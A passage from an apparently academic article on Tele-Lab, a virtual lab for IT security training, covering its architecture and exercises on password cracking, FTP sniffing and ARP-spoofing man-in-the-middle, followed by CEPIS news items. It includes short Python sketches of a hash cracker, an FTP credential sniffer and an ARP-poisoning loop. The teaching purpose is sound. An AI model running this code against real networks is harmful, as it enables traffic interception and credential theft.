maximum limit of VMs that can be allocated, it automatically requests HPI’s
Tele-Lab server to allocate a VM from
its own resources (and vice versa). This
automatic process occurs seamlessly,
so the user does not experience any disruptions. In the future, this collaboration arrangement can easily be expanded into a grid of different institutions, sharing their Tele-Lab server’s
resources to each other, thus evenly
distributing the whole process workload, when e.g. there is a peak in VM
demand at one of the partners’ site.
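A minimal sketch of the cross-site fallback described above, with assumed class and method names (this is not the Tele-Lab API): a request is served from the local pool when possible and is otherwise forwarded to a partner Tele-Lab server, for instance over its XML-RPC interface.

class PoolExhausted(Exception):
    # Raised when the local server has reached its VM limit.
    pass

def allocate_team(local_pool, partner_server, team_template):
    try:
        return local_pool.assign_team(team_template)      # normal case: local resources
    except PoolExhausted:
        # Seamless for the user: the partner allocates the team from its own pool.
        return partner_server.assign_team(team_template)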
2 BackOrifice (BO) is a Remote Access Trojan Horse developed by the hacker group "Cult of the Dead Cow", see <http://www.cultdeadcow.com/tools/bo.php>.
3 Grails is an open-source framework for web application development, see <http://www.grails.org/>.
4 See <http://www.linux-kvm.org/> and <http://www.qemu.org/>.
For the network connections within
the teams, Tele-Lab uses the Virtual
Distributed Ethernet (VDE)5 package.
VDE emulates all physical aspects of
Ethernet LANs, in software. The Tele-Lab Control Services launch virtual
switches or hubs for each virtual network defined for a team of VMs and
connect the machines to the appropriate network infrastructure. For the distribution of IP addresses in the virtual
networks, a DHCP server is attached
to every network. After sending out all
leases, the DHCP server is killed due
to security constraints. [7]
Database: The Tele-Lab database
holds all user information, the content
for web-based training and learning
unit structure as well as the information on virtual machine and team templates. A VM template is the description of a VM disk image that can be
cloned in order to get more VMs of that
type. Team templates are models for
connected VMs that are used to perform certain exercises. The database
also persists current virtual machine
states.
Remote Desktop Access Proxy: The
Tele-Lab server must handle concurrent remote desktop connections for
users performing exercises. This is realized using the open-source project
noVNC6 , a client for the Virtual Network Computing Protocol based on
HTML5 Canvas and WebSockets. The
noVNC package comes with the
HTML5 client and a WebSockets
proxy which connects the clients to the
VNC servers provided by QEMU. Ensuring a protected environment for
both the Tele-Lab users and system is
a challenge that is important to thoroughly implement at all levels, as the
issue of network security for virtual
machines in a Cloud Computing setting (such as the case of Tele-Lab)
poses special requirements. [8] The
system uses a token-based authentication system: an access token for a re-
mote desktop connection is generated,
whenever a user requests a virtual machine team for performing an exercise.
Using TLS ensures the confidentiality
of the token.
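As a rough illustration of the token mechanism just described (names and in-memory storage are assumptions, not the actual Tele-Lab implementation): a one-time token is issued when a virtual machine team is assigned, handed to the browser over TLS, and later redeemed by the WebSockets proxy to find the right VNC endpoint.

import secrets

ACTIVE_TOKENS = {}  # token -> (user_id, vnc_host, vnc_port)

def issue_token(user_id, vnc_host, vnc_port):
    token = secrets.token_urlsafe(32)                     # unguessable, URL-safe token
    ACTIVE_TOKENS[token] = (user_id, vnc_host, vnc_port)
    return token                                          # delivered to the client over TLS

def redeem_token(token):
    # Called by the remote desktop proxy; the token is one-time use, so it is removed here.
    return ACTIVE_TOKENS.pop(token, None)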
Administration Interface: The Tele-Lab server comes with a sophisticated
web-based administration interface
that is also implemented as a Grails
application (not depicted in Fig. 2). On
the one hand, this interface is made for
content management in the web-based
training environment and on the other,
for user management. Additionally, the
admin interface can be used for manual
virtual machine control, monitoring
and for registering a new virtual machine or team templates.
Tele-Lab Control Services: The
purpose of the central Tele-Lab control services is to bring all the above
components together. To realize an
abstraction layer for encapsulation of
the virtual machine monitor (or
hypervisor) and the remote desktop
proxy, the system implements a
number of lightweight XML-RPC web
services. The vmService is for controlling virtual machines – start, stop or
recover them, grouping teams or assigning machines or teams to a user.
The remoteDesktopService is used to
initialize, start, control and terminate
remote desktop connections to assigned machines. The above-mentioned Grails applications (portal, tutoring environment, and web admin)
allow the user to control the whole system using the web services.
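The following is a hedged sketch of such a lightweight XML-RPC control service, written with Python's standard library rather than the actual Tele-Lab code base; the method names and semantics are assumptions modelled on the vmService described above, and a real implementation would drive the KVM/Qemu hypervisor behind these calls.

from xmlrpc.server import SimpleXMLRPCServer

class VmService:
    def __init__(self):
        self.assignments = {}                             # user_id -> list of assigned VM ids

    def assign_team(self, user_id, team_template):
        # A real implementation would clone VMs from the team template and start them.
        vm_ids = [f"{team_template}-{i}" for i in range(3)]
        self.assignments[user_id] = vm_ids
        return vm_ids

    def recover(self, vm_id):
        # A real implementation would revert the VM to its original snapshot.
        return f"{vm_id} reverted"

server = SimpleXMLRPCServer(("localhost", 8000), allow_none=True)
server.register_instance(VmService())
server.serve_forever()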
On the client side, the user only needs
a web browser supporting SSL/TLS. The
current implementation of the noVNC
client does not even need an HTML5-capable browser: for older browsers,
HTML5 Canvas and/or the WebSockets
are emulated using Adobe Flash.
IT Security Exercises
As stated before, one of the strengths of Tele-Lab (and other isolated laboratories) is the ability to provide secure training environments for exercises, where the student takes the perspective of an attacker. Next to the learning unit on Trojan horses presented in chapter 2, we introduce a set of additional exercise scenarios to illustrate this approach: Attacks on Accounts and Passwords, Eavesdropping of Network Traffic, and a Man-in-the-Middle Attack.
5 See <http://vde.sourceforge.net/>.
6 See <http://kanaka.github.com/noVNC/>.
7 See e.g. <http://www.rsa.com/solutions/consumer_authentication/reports/9381_Aberdeen_Strong_User_Authentication.pdf>.
8 See <http://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/>.
Exercise Scenario A: Attacks on
Accounts and Passwords
Gaining valid user credentials for
a computer system is obviously a major objective for any attacker. Hackers can
get access to personal and confidential data or use a valid login as a starting point for numerous further attacks,
such as gaining privileged access to
their target system.
It is well known that one should set
a password consisting of letters (upper and lower case), numbers and special characters. Moreover, the longer a
password is, the harder it is to crack.
Thus, it is inherently important for a
user to choose strong credentials – even
though passwords of high complexity
are harder to memorize.
Studies7 show that users still choose very weak passwords if they are allowed to. In December 2009, a hacker stole passwords from the popular online platform rockyou.com and released a dataset of 32 million passwords to the Internet8. An analysis of those passwords revealed several interesting findings:
• 30% of the users chose passwords with a length of 6 characters or less, and 50% had a password no longer than 7 characters
• Almost 60% of the users chose their password from a limited set of alphanumeric characters
• Nearly 50% used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on)
The learning unit on Password Security explains how passwords are
stored within computer systems (i.e.
password hashes in Linux), and how
tools like Password Sniffers, Dumpers
and Crackers work.
Figure 3: Man-in-the-Middle Attacks.
In the exercise section, the user is
asked to experience how fast weak
passwords can be cracked. On the
training machine (Windows XP) the
user must dump the passwords to a file
using PwDump, and crack the hashes
with the well-known John-the-Ripper9
password recovery tool. It quickly becomes obvious that passwords like the username or words from dictionaries can usually be cracked within a few seconds.
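In essence, a password cracker of the kind used in this exercise does nothing more than the following simplified sketch: hash every dictionary candidate and compare it against the dumped hashes. Real password stores use salted, slower hash schemes, which delay but do not prevent this attack on weak passwords; the unsalted MD5 hash here is purely illustrative.

import hashlib

def crack(dumped_hashes, wordlist):
    found = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()   # weak, unsalted hash for illustration
        if digest in dumped_hashes:
            found[digest] = word
    return found

dumped = {hashlib.md5(b"alice123").hexdigest()}
print(crack(dumped, ["password", "alice123", "letmein"]))  # recovers 'alice123' instantly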
The learning unit concludes with
hints on how to choose a strong password
that can be memorized easily.
Exercise Scenario B: Eavesdropping of Network Traffic
The general idea of eavesdropping
is to secretly listen to the private communication of two (or more) communication partners without their consent.
In the domain of computer networks,
the common technique for eavesdropping is packet sniffing. There are a
number of tools for packet sniffing –
packet analyzers – freely available on
the Internet, such as the well-known
tcpdump or Wireshark10 (used in this
learning unit).
A learning unit on packet sniffing
in a local network starts with an introduction to communication on the data-link layer (Ethernet) and explains the
difference between a network with a
hub and a network in a switched environment.
This is important for eavesdropping, because this kind of attack is
much easier when connected to a hub.
The hub will forward every packet
coming in to all its ports and hence to
all connected computers. These hosts
decide whether they accept and further process the incoming data based on the
MAC address in the destination field
of the Ethernet frame header: if the
destination MAC is their own MAC
address, the Ethernet frame is accepted,
or dropped otherwise. If there is a packet analyzer running, frames not intended for the respective host can also be captured, stored and analyzed. This situation is different in a switched network: the switch does not broadcast incoming data to all ports but interprets the MAC destination to "switch" a dedicated line between source and destination ports. In consequence, the Ethernet frame is only delivered to the actual receiver.
9 See <http://www.openwall.com/john> for information on John-the-Ripper, <http://www.foofus.net/~fizzgig/pwdump/> for PwDump6.
10 See <http://www.wireshark.org/>.
After this general information on
Ethernet-based networking, the learning unit introduces the idea of packet
sniffing and describes capabilities and
usage of the packet analyzer
Wireshark, especially on how to capture data from the Ethernet device and
how to filter and read the captured data.
The practical exercise presents the
following task to the learner: "Sniff and
analyze network traffic on the local
network. Identify login credentials and
use them to obtain a private document." The student is challenged to
enter the content of this private document to prove that he/she has solved
the task.
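To make the task concrete, here is a hedged sketch using the scapy packet library (an assumption for illustration; the exercise itself uses Wireshark): it captures FTP control traffic on port 21 and prints the plaintext USER and PASS commands.

from scapy.all import sniff, Raw, TCP

def show_credentials(packet):
    if packet.haslayer(TCP) and packet.haslayer(Raw):
        payload = packet[Raw].load
        if payload.startswith(b"USER") or payload.startswith(b"PASS"):
            print(payload.decode(errors="replace").strip())

# Requires root privileges; only run on networks you are allowed to monitor.
sniff(filter="tcp port 21", prn=show_credentials, store=False)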
When requesting access to a training environment, the user is assigned
to a team of three virtual machines: the
attacker machine that is equipped with
the Wireshark tool, and two machines
of (scripted) communication partners:
Alice and Bob. In this scenario, Bob’s
machine hosts an FTP server and a Web
server, while Alice’s VM runs a script
that generates traffic by initiating arbitrary connections to the services on
Bob’s host. Among those client/server
connections are successful logins to
Bob’s FTP server. As this learning unit
focuses on sniffing and the interpretation of the captured traffic, the machines are connected with a hub. There
is no need for the attacker to get into a
Man-in-the-Middle position in order to
capture the traffic between Alice and
Bob.
Since FTP does not encrypt credentials, the student can obtain username
and password to log in to that service.
On the server, the student finds a file
called private.txt that contains the response to the challenge mentioned
above.
The section concludes with hints on
preventing eavesdropping attacks,
such as the usage of services with secure authentication methods (i.e. SFTP
or ftps instead of plain FTP) and data
encryption.
Exercise Scenario C: Man-in-the-Middle Attack with ARP Spoofing
The general idea of a Man-in-the-Middle attack (MITM) is to intercept communication between two communication partners (Alice and Bob)
by initiating connections between the
attacker and both victims and spoofing the identity of the respective communication partner (Fig. 3). More specifically, the attacker pretends to be
Bob and opens a connection to Alice
(and vice versa). All traffic between
Alice and Bob is being relayed via the
attacker’s computer. While relaying,
the messages can be captured and/or
manipulated.
MITM attacks can be implemented
on different layers of the TCP/IP network stack, e.g. DNS cache poisoning
on the application layer, ICMP redirecting on the internet layer or ARP
spoofing in the data-link layer. This
learning unit focuses on the last-mentioned attack, which is also called ARP
cache poisoning.
The Address Resolution Protocol
(ARP) is responsible for resolving IP
addresses to MAC addresses in a local
network. When Alice’s computer
opens an IP-based connection to Bob’s
computer in the local network, it has
to determine Bob’s MAC address at
first, since all messages in the LAN are
transmitted via the Ethernet protocol
(which is only aware of the MAC addresses). If Alice only knows the IP address of Bob’s host (e.g. 192.168.0.10), she performs an ARP
request: Alice sends a broadcast message to the local network and asks,
"Who has the IP address
192.168.0.10?" Bob’s computer answers with an ARP reply that contains
its IP address and the corresponding
MAC address. Alice stores that address
mapping in her ARP cache for further
communication.
ARP spoofing [10] is basically
about sending forged ARP replies: referring to the above example, the attacker repeatedly sends ARP replies to
Alice with Bob’s IP address and MAC
address – the attacker pretends to be
Bob. When Alice starts to communicate with Bob, she sends the ARP request and instantly receives one of the
forged ARP replies from the attacker.
She then mistakenly thinks that the attacker’s MAC address belongs to Bob
and stores the faked mapping in her
ARP cache. Since the attacker performs the same operation for Alice’s
MAC address, he/she can also trick Bob into believing that his/her MAC address is that of Alice. In consequence, Alice sends all messages intended for Bob to the MAC address of the attacker (and the
same applies for Bob’s messages to
Alice). The attacker just has to store
the original MAC addresses of Alice
and Bob to be able to relay to the original receiver.
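The forged ARP replies described above can be sketched with the scapy library (again an assumption for illustration; the learning unit itself uses Ettercap). The addresses below are placeholders, and such code must only ever be run against systems one is explicitly allowed to attack.

import time
from scapy.all import ARP, send

def poison(victim_ip, victim_mac, spoofed_ip, attacker_mac):
    # op=2 is an ARP reply claiming "spoofed_ip is at attacker_mac", addressed to the victim.
    send(ARP(op=2, psrc=spoofed_ip, hwsrc=attacker_mac,
             pdst=victim_ip, hwdst=victim_mac), verbose=False)

while True:
    # Tell Alice that Bob's IP maps to the attacker's MAC, and tell Bob the same about Alice.
    poison("192.168.0.20", "aa:aa:aa:aa:aa:aa", "192.168.0.10", "cc:cc:cc:cc:cc:cc")
    poison("192.168.0.10", "bb:bb:bb:bb:bb:bb", "192.168.0.20", "cc:cc:cc:cc:cc:cc")
    time.sleep(2)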
A learning unit on ARP spoofing
begins with general information on
communication in a local network. It
explains the Internet Protocol (IP),
ARP and Ethernet including the relationship between the two addressing
schemes (IP and MAC addresses).
Subsequently, the above attack is described in detail and a tool that implements ARP spoofing and a number of additional MITM attacks is presented: Ettercap11. At this point, the learning unit also explains what the attacker can do if he/she successfully becomes Man-in-the-Middle, such
as specifying Ettercap filters to manipulate the message stream.
The hands-on exercise of this chapter asks the student to perform two different tasks. The first one is the same
as described in the exercise on packet
sniffing above: to monitor the network
traffic, gain FTP credentials and steal
a private file from Bob’s FTP server.
The training environment is also set up
similarly to the prior scenario. The difference is that this time the team of
three virtual machines is connected
through a virtual switch (instead of a
hub), so that capturing the traffic with
Wireshark would not reveal the messages between Alice and Bob. Again,
the student has to prove the successful attack by entering the content of the secret file in the tutoring interface.
The second (optional) task is to
apply a filter on the traffic and replace
all images in the transmitted HTML
content by an image from the attacker’s host (which would be displayed in
Alice’s browser).
This kind of attack still works and is dangerous in many currently deployed local network installations. The
only way to protect oneself against
ARP spoofing would be the usage of
SSL with a careful verification of the
host’s certificate, which is explained in
the conclusion of the learning unit.
A future enhancement of the practical exercise on ARP spoofing would
be the interception of an SSL secured
channel: Ettercap also allows a more
sophisticated MITM attack including
the on-the-fly generation of faked SSL
certificates, which are presented to the
victims instead of the original ones.
The Man-in-the-Middle can then decrypt and re-encrypt the SSL traffic
when relaying the messages.
11 See <http://ettercap.sourceforge.net/>.
Outlook and Conclusion
The Tele-Lab system has been developed in order to address the particular challenges and needs posed in
IT security training and IT security
laboratory settings. First of all, it is
essential for an IT security course to
be able to provide real hands-on experience to the learners, by using the necessary systems and contemporary IT
security tools. For this, the use of virtual machines is an obvious approach
in order to, on one hand, deliver realistic hands-on exercises to the learners and on the other hand, to isolate
such exercises from the "real" network
infrastructure of the training provider.
The continuously increasing importance of the issue of IT security, as it is
presented every day in the mass media,
and the very serious negative repercussions it can bring nowadays, pushes for
more awareness and a more imperative
need for IT security knowledge and
practical skills. Academic institutions
and training providers need to provide training that is state of the art; however, constructing an IT security training environment (i.e., a computer laboratory devoted to IT security training) requires knowledge, a considerable upfront investment for acquisition, and costs for administration and maintenance, and poses risks when there are omissions in properly insulating such physical laboratories from the rest of the network infrastructure. Tele-Lab mitigates those difficulties by providing a considerably cheaper solution that requires nearly no effort at all for maintenance and administration.
More importantly, the continuous evolution of the issue of IT security (which evolves in parallel to, and is intertwined with, all innovations in ICT) demands constant updating of the curriculum with new learning units, or updating existing learning units with new complicating factors. Although Tele-Lab provides the facilities for easy addition of new learning units and exercises, the big feat of updating the knowledge base can be achieved by collaboration of the different institutions that are using Tele-Lab, and by sharing amongst them the new learning units and newly constructed system functionalities. Sharing resources (e.g. virtual machines) in order to even out the system workload is also a valuable outcome of such cooperation. In the example of the project consortium mentioned in sections 2 and 3, such arrangements have already been put in place, and the consortium partners share knowledge, development tasks, functionalities, new curriculum content and resources.
It is a challenge to prove that Tele-Lab, in combination with such a collaborative and evolving model of cooperation among networks of institutions, can deliver an innovative and always up-to-date course of high standards that addresses the difficulties faced in modern IT security training.
References
[1] C. Border. The development and
deployment of a multi-user, remote access virtualization system
for networking, security, and system administration classes.
SIGCSE Bulletin, 39(1): 576–
580, 2007.
[2] J. Hu, D. Cordel, and C. Meinel.
A Virtual Machine Architecture
for Creating IT-Security Laboratories. Technical report, Hasso-Plattner-Institut, 2006.
[3] J. Hu and C. Meinel. Tele-Lab IT-Security on CD: Portable, reliable
and safe IT security training.
Computers & Security, 23:282–
289, 2004.
[4] J. Hu, M. Schmitt, C. Willems,
and C. Meinel. A tutoring system
for IT-Security. In Proceedings of
the 3rd World Conference in Information Security Education,
pages 51–60, Monterey, USA,
2003.
[5] C. Willems and C. Meinel. Awareness Creation mit Tele-Lab IT-Security: Praktisches Sicherheitstraining im virtuellen Labor am
Beispiel Trojanischer Pferde. In
Proceedings of Sicherheit 2008,
pages 513–532, Saarbrücken,
Germany, 2008.
[6] C. Willems and C. Meinel. Tele-Lab IT-Security: an Architecture
for an online virtual IT Security
Lab. International Journal of
Online Engineering (iJOE), X,
2008.
[7] C. Willems and C. Meinel, Practical Network Security Teaching
in a Virtual Laboratory. In Proceedings of Security and Management 2011, Las Vegas, USA, 2011
(to appear).
[8] C. Willems, W. Dawoud, T.
Klingbeil, and C. Meinel. Security in Tele-Lab – Protecting an
Online Virtual Lab for IT Security Training, In Proceedings of
ELS’09 (in conjunction with 4th
ICITST), IEEE Press, London,
UK, 2009.
[9] W. Yurcik and D. Doss. Different
approaches in the teaching of information systems security. In Security, Proceedings of the Information Systems Education Conference, pages 32–33, 2001.
[10] S. Whalen. An Introduction to
ARP Spoofing. Online: <http://
www.rootsecure.net/content/
downloads/pdf/arp_spoofing_
intro.pdf>.
[11] J. Bersin, C. Howard, K.
O’Leonard, and D. Mallon.
Learning Management Systems
2009, Technical Report, Bersin &
Associates, 2009. Online: <http://www.bersin.com/Lib/Rs/Details.aspx?docid=10339576>.
CEPIS News
CEPIS Projects
Selected CEPIS News
Fiona Fanning
e-Skills and ICT Professionalism Interim Report Now Published
The interim report of the e-Skills
and ICT Professionalism project has
been published. This project is conducted by CEPIS and the Innovation
Value Institute (IVI) on behalf of the
European Commission. The synthesis
report marks the halfway point of the
research which is due to be completed
in 2012 and also signifies the end of
phase 1 of the project. CEPIS and IVI
aim to provide detailed proposals for a
European Framework for ICT Professionalism, and a European Training
Programme for ICT Managers in the
final report.
Phase 1 combined desktop research, analysis, and hundreds of interviews with ICT experts from across
Europe, North America and Asia Pacific through the ICT Professionalism
Survey. The research analysis so far
suggests that the following four key
areas act as building blocks for an ICT
profession:
• a common body of knowledge
• competences
• certification, standards and qualifications
• professional ethics/codes of conduct
CEPIS would like to thank all of
their Members who participated in the
ICT Professionalism Survey and who
provided essential expert information
about their attitudes to structures of
professionalism within ICT. We also
welcome any further comments.
The European ICT Professionalism
Project Interim Report can be
downloaded at: <http://www.cepis.org/
media/EU_ICT_Prof_interim_report_
PublishedVersion1.pdf>.
Scoreboard shows only a Third
of World’s Top 50 R&D Investors
are European
The 2011 EU Industrial R&D Investment Scoreboard, which ranks the world’s top 1,400 companies by their R&D investment during 2010, has just
been published by the European Commission. Overall, R&D investment by
European companies has increased by
6.1% following the post-economic crisis decrease of 2.6% in 2009. However
US companies reported an even higher
rate of R&D investment at 10% during 2010.
European companies continue to lag
behind other global R&D investors especially since only 15 of the top 50 companies in the world to invest in R&D
during 2010 are European. Most of the
non-EU companies in the top 50 with the
largest increases were in the pharmaceutical and ICT sectors, yet among the European companies only four were in ICT. You can access the 2011
EU Industrial R&D Investment Scoreboard at: <http://iri.jrc.ec.europa.eu/research/docs/2011/SB2011.pdf>.
European Commission Proposes €80 Billion Horizon 2020 Programme for Research and Innovation
The European Commission recently announced a new programme
for investment in research and innovation called Horizon 2020. Horizon 2020 will bring all EU research and innovation funding together under one programme, and in doing so aims to simplify rules and procedures and greatly reduce the amount of time-consuming bureaucracy associated with
funding programmes until now.
Funding will be focused towards
three main objectives:
• Support Europe’s position as a world leader in science
• Help secure industrial leadership in innovation
• Address major concerns across several themes such as energy efficiency and inclusive, innovative and secure societies
The proposal and overall budget of
Horizon 2020 are currently under negotiation with the European Parliament
and the Council of Europe, and by
January 2014 the first calls for proposals are expected to be launched. Horizon 2020 is the financial instrument of
the flagship initiative Innovation Union and forms part of the drive to create new growth and jobs in Europe. To
find out more about Horizon 2020,
please click here: <http://ec.europa.eu/
research/horizon2020/index_en.cfm?
pg=home>.
CEPIS Research shows Gender
Imbalance in the IT Profession
Risks Europe’s Growth Potential
Less than one fifth of European IT
professionals are women according to
new research that calls for Europe to
urgently redress the gender imbalance.
Highly skilled roles and enough human
capital to fill these jobs will be vital
for the smart growth economy that
Europe aspires to create by 2020. Yet a recent European report by the Council of European Professional Informatics Societies (CEPIS), announced in the last issue of CEPIS UPGRADE,
shows that women represent only 8%
of IT professionals in some countries.
With few women entering the IT profession as the demand for skilled IT
professionals increases, Europe’s economic success may be jeopardized.
The research identified and analysed
the e-competences of almost 2,000 IT
professionals across 28 countries in
greater Europe. It presents an up-to-date
snapshot of the e-competences held by
IT professionals today and it shows that, worryingly, less than one fifth of IT professionals in Europe are female. In
the European report CEPIS puts forward
key recommendations for action, including a call for all countries to urgently redress the gender imbalance and increase
the participation of women in IT careers,
<http://cepis.org/media/CEPIS_Prof_
eComp_Pan_Eu_Report_FINAL_
101020111.pdf>.
CEPIS recommends that existing
initiatives with a focus on role models
and mentoring programmes, such as
the European Commission’s Shadowing Days, should be replicated and
scaled up.
Another means to encourage a better balance would be to provide fiscal
incentives for companies that adopt
gender equity as part of their organisational culture, hiring practices and
career advancement programmes.
CEPIS strongly believes that the European Commission has a role to play
in continuing to promote a European
culture of gender equity in the IT profession. You can read more about the
CEPIS Professional e-Competence
Project at: <http://www.cepis.org/
professionalecompetence>.